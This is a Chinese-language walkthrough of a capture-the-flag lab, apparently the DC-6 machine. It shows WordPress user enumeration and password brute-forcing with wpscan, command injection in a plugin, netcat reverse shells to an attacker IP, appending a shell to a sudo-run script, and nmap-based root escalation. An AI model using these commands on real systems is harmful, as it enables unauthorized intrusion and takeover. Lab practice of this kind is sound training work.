一、信息收集
1.查看MAC地址
2.主机探测
3.目录扫描
发现扫出来多条目录,尝试一会儿利用
4.端口扫描
发现开放两个端口
二、GetShell
1.打开80端口,发现打不开,但是有域名,需要在系统hosts文件上添加解析
再次访问该IP,页面发生跳转
2.查看页面功能点,发现该网站框架为WordPress框架,版本为5.1.1
拼接上面扫出的目录/wp-login.php,出现一个登录页面
弱口令登录失败,但是得出一个账号为admin
使用爆破工具wpscan,猜解账号密码:
wpscan --url http://wordy -e u
枚举出来了五个账号分别是admin、graham、mark、sarah、jens
创建一个dc6user.txt的文本并写入
在靶机的官网有密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6passwd.txt
进行密码暴破
wpscan --url http://wordy/ -U dc6user.txt -P dc6passwd.txt
查找出了mark的密码为helpdesk01,登录上面的网站,登录成功
成功登入后台,发现在Activity monitor插件处有可执行命令的地方
输入127.0.0.1试试
发现成功解析,看看拼接系统命令能不能执行
成功执行
进行反弹shell,发现搜索框好像存在长度限制,右键检查,看看能不能直接写在代码框中
127.0.0.1;nc -e /bin/bash 192.168.208.129 4444
发现可以写入 ,kali开启监听
nc -lvvp 4444
成功反弹到shell
获取交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
发现当前目录下没有任何可利用文件,切换到家目录查看,发现有四个用户信息
逐一查看,发现在jens目录下存在一个.sh文件,查看后发现是一个shell脚本
发现在mark目录下存在一个txt文件,里面存在一个账户密码信息,尝试ssh远程连接
远程连接成功
三、提权
sudo -l
查看sudo -l 下的内容,发现jens用户具有权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell
echo "nc -e /bin/bash 192.168.208.129 4444" >> backups.sh
执行文件
sudo -u jens /home/jens/backups.sh
kali监听4444端口
成功反弹shell
sudo -l
发现要提到root权限需要利用nmap进行提权
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
提权成功,成功拿到flag